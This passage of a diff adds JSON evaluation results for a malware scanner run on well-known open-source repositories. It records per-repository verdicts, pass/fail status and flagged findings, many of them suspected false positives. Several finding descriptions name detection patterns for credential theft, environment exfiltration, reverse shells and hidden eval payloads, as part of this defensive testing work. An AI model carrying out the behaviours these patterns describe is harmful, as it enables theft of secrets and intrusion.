"critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": ".github/actions/pr-auto-label/dist/index.js", + "line": 1, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_AWS_KEY", + "file": ".github/actions/pr-auto-label/dist/index.js", + "line": 2, + "description": "AWS Access Key ID pattern (AKIA...) committed to source code" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/pr-auto-label/dist/index.js", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/pr-auto-label/dist/index.js", + "line": 1, + "description": "Extremely long line detected (284,182 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (277,617 chars, contains suspicious code), Line 2 (284,182 chars, contains suspicious code), Line 3 (70,968 chars, contains suspicious code)" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/upload-turboyet-data/dist/index.js", + "line": 8, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/upload-turboyet-data/dist/index.js", + "line": 8, + "description": "Extremely long line detected (55,653 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 8 (55,653 chars, contains suspicious code)" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/upload-turboyet-data/dist/sourcemap-register.js", + "line": 1, + "description": "Extremely long line detected (41,053 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (41,053 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 19, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 19, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 29628, + "treeTruncated": false, + "durationMs": 6218, + "error": "" + }, + { + "sampleId": "reference-nest", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/nestjs/nest", + "immutableRef": "f2938487c45db149964a8b0efc58a073610dcdf1", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 1928, + "treeTruncated": false, + "durationMs": 3015, + "error": "" + }, + { + "sampleId": "noisy-vscode", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/vscode", + "immutableRef": "af2c64423e7ee5d1030a000c82a0bb774d043351", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "CREDENTIAL_THEFT", + "NETWORK_COMMUNICATION", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/buildfile.ts", + "line": 16, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "CREDENTIAL_THEFT", + "file": "build/darwin/sign.ts", + "line": 145, + "description": "Reads browser password databases (Chrome Login Data, Firefox logins.json) or dumps the macOS Keychain via the security(1) command" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/filters.ts", + "line": 72, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/gulpfile.reh.ts", + "line": 74, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/gulpfile.vscode.ts", + "line": 86, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/gulpfile.vscode.web.ts", + "line": 70, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "build/azure-pipelines/common/publish.ts", + "line": 598, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "build/builtin/browser-main.js", + "line": 42, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 16247, + "treeTruncated": false, + "durationMs": 4440, + "error": "" + }, + { + "sampleId": "noisy-playwright", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/playwright", + "immutableRef": "2670e5cae0239502d053e530da2c675e5aa536aa", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBFUSCATED_CODE", + "OBF_EVAL", + "DATA_EXFILTRATION", + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "browser_patches/firefox/juggler/TargetRegistry.js", + "line": 267, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "packages/html-reporter/src/images.ts", + "line": 17, + "description": "Extremely long line detected (90,767 characters). Malicious code may be hidden far to the right. Affected: Line 17 (90,767 chars)" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/injected/src/clock.ts", + "line": 369, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/injected/src/injectedScript.ts", + "line": 247, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "packages/injected/src/recorder/clipPaths.ts", + "line": 30, + "description": "Extremely long line detected (7,049 characters). Malicious code may be hidden far to the right. Affected: Line 30 (7,049 chars)" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/injected/src/utilityScript.ts", + "line": 73, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "packages/injected/src/bidiInsertText.ts", + "line": 34, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "packages/injected/src/injectedScript.ts", + "line": 869, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "packages/injected/src/recorder/clipPaths.ts", + "line": 30, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + } + ], + "filesScanned": 200, + "filesSkipped": 3047, + "treeTruncated": false, + "durationMs": 3564, + "error": "" + }, + { + "sampleId": "noisy-cypress", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/cypress-io/cypress", + "immutableRef": "cd8bb88f1080d0ee354e605fadba986b03320828", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "cli/package.json", + "line": null, + "description": "Possible typosquat of \"eslint\": dtslint" + } + ], + "filesScanned": 200, + "filesSkipped": 6980, + "treeTruncated": false, + "durationMs": 4024, + "error": "" + }, + { + "sampleId": "noisy-electron", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/electron/electron", + "immutableRef": "8215b5aa536ec6ae121003bc618bdd825bdbbb0f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.27, + "safeToClone": true, + "rulesTriggered": [ + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/fiddles/features/navigation-history/renderer.js", + "line": 20, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/fiddles/ipc/pattern-1/renderer.js", + "line": 4, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/fiddles/system/clipboard/copy/renderer.js", + "line": 5, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 2849, + "treeTruncated": false, + "durationMs": 4967, + "error": "" + }, + { + "sampleId": "noisy-esbuild", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/evanw/esbuild", + "immutableRef": "6ff1d8b0d8c134e867a397eef39702a223ebef9e", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.49, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_FILE_ACCESS", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "lib/npm/node-install.ts", + "line": 169, + "description": "Suspicious file access detected: System Directory Write" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "pkg/api/api_impl.go", + "line": 2288, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 149, + "treeTruncated": false, + "durationMs": 8079, + "error": "" + }, + { + "sampleId": "noisy-node", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/nodejs/node", + "immutableRef": "1314579f8c82ed70b8cbe736fdea1df48624c285", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_NEW_FUNCTION", + "OBF_EVAL" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "benchmark/buffers/buffer-fill.js", + "line": null, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "benchmark/buffers/buffer-swap.js", + "line": 74, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "benchmark/error/determine-specific-type.js", + "line": 52, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "benchmark/es/eval.js", + "line": 28, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + } + ], + "filesScanned": 200, + "filesSkipped": 49533, + "treeTruncated": false, + "durationMs": 4967, + "error": "" + }, + { + "sampleId": "reference-hapijs-hapi", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/hapijs/hapi", + "immutableRef": "d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "REVERSE_SHELL", + "OBF_BASE64_HEAVY", + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "REVERSE_SHELL", + "file": "test/core.js", + "line": 2147, + "description": "Socket-based reverse shell connection — creates a TCP connection back to attacker" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "test/core.js", + "line": 201, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "test/transmit.js", + "line": 1188, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "test/core.js", + "line": 1434, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "test/request.js", + "line": 196, + "description": "Suspicious network communication detected: Hardcoded IP Address (4 occurrences)" + } + ], + "filesScanned": 62, + "filesSkipped": 12, + "treeTruncated": false, + "durationMs": 3139, + "error": "" + }, + { + "sampleId": "reference-reduxjs-redux", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/reduxjs/redux", + "immutableRef": "5d65348e26635b6ec627b1030732ed38797e88e9", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "medium", + "actualScore": 0.57, + "safeToClone": false, + "rulesTriggered": [ + "NETWORK_URL_SHORTENER", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/counter-ts/src/index.tsx", + "line": 22, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/counter/src/index.js", + "line": 22, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "examples/real-world/src/components/Explore.js", + "line": 21, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "examples/todos-with-undo/src/containers/AddTodo.js", + "line": 13, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "examples/todos/src/containers/AddTodo.js", + "line": 13, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 276, + "treeTruncated": false, + "durationMs": 6616, + "error": "" + }, + { + "sampleId": "reference-reduxjs-redux-toolkit", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/reduxjs/redux-toolkit", + "immutableRef": "7b269256424e1d44baf83d7de634d9f53931dda7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 952, + "treeTruncated": false, + "durationMs": 2976, + "error": "" + }, + { + "sampleId": "reference-immerjs-immer", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/immerjs/immer", + "immutableRef": "60ca295e1185db80322ef55ec3fb8475cbc960c7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "NETWORK_URL_SHORTENER" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "src/utils/errors.ts", + "line": 48, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + } + ], + "filesScanned": 60, + "filesSkipped": 105, + "treeTruncated": false, + "durationMs": 3051, + "error": "" + }, + { + "sampleId": "reference-date-fns-date-fns", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/date-fns/date-fns", + "immutableRef": "4098115cf705e3af7f663d8e5b0686e39a9f478a", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_EVAL", + "SUSPICIOUS_FILE_ACCESS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/basic.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/fp.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/legacy.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/legacyStrict.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/locale.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "high", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/locales.js", + "line": null, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "pkgs/core/scripts/build/package.sh", + "line": 221, + "description": "Suspicious file access detected: Destructive File Deletion" + } + ], + "filesScanned": 200, + "filesSkipped": 1703, + "treeTruncated": false, + "durationMs": 3166, + "error": "" + }, + { + "sampleId": "reference-ramda-ramda", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/ramda/ramda", + "immutableRef": "bcb320e60b5d91c958a6b02feb0bd8658d744298", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "OBFUSCATED_CODE" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "dist/ramda.min.js", + "line": 1, + "description": "Extremely long line detected (53,748 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (53,748 chars, contains suspicious code)" + } + ], + "filesScanned": 200, + "filesSkipped": 513, + "treeTruncated": false, + "durationMs": 4689, + "error": "" + }, + { + "sampleId": "reference-sindresorhus-got", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/sindresorhus/got", + "immutableRef": "e3924aa1e53a6ca3eb93a43618ce532442a89b40", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "REVERSE_SHELL", + "NETWORK_COMMUNICATION", + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "REVERSE_SHELL", + "file": "test/timeout.ts", + "line": 258, + "description": "Socket-based reverse shell connection — creates a TCP connection back to attacker" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "test/dns-cache-regressions.ts", + "line": 105, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "test/dns-cache.ts", + "line": 453, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "test/hooks.ts", + "line": 893, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "test/https.ts", + "line": 3427, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "test/normalize-arguments.ts", + "line": 55, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "test/pagination.ts", + "line": 981, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "test/redirects.ts", + "line": 3015, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 87, + "filesSkipped": 40, + "treeTruncated": false, + "durationMs": 3585, + "error": "" + }, + { + "sampleId": "reference-socketio-socket-io", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/socketio/socket.io", + "immutableRef": "d2d753fed4435015c2d83fe62e676b44e07fa3f7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "NETWORK_URL_SHORTENER", + "BACKDOOR_HARDCODED_AUTH", + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/create-react-app-example/src/index.js", + "line": 17, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/create-react-app-example/src/serviceWorker.js", + 